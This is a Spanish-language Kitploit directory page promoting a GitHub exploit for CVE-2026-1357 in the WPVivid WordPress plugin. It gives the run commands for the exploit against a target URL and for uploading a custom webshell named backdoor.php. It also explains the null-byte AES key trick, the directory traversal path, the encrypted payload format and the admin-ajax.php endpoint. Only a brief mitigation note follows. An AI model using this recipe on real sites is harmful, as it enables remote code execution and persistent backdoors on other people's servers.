Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Exploit-CVE-2026-1357 — Exploit para CVE-2026-1357 en el plugin WPVivid de WordPress, que permite la ejecución remota de código mediante payloads cifrados con AES manipulados y un directory traversal para subir un webshell. | Kitploit
Herramientas/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

Exploit para CVE-2026-1357 en el plugin WPVivid de WordPress, que permite la ejecución remota de código mediante payloads cifrados con AES manipulados y un directory traversal para subir un webshell.

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Instalar dependencias

pip3 install pycryptodome requests

Exploit básico

python3 wpvivi.py http://target.com

Webshell personalizada

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" Explicación técnica: Null Byte Key: Cuando RSA decrypt falla, devuelve false, que phpseclib trata como "\x00\x00\x00". Usamos 16 null bytes como clave AES-128 ECB. Directory Traversal: El nombre de archivo no está sanitizado, permitiendo ../../../../wp-content/uploads/shell.php Formato del payload:

[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] Ejecución: POST a /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(payload cifrado) Detección y Mitigación:

Parcheado en 0.9.124:

  • Check if ($key === false || empty($key)) return false;
  • Extension whitelist: zip,gz,tar,sql
Descargar herramienta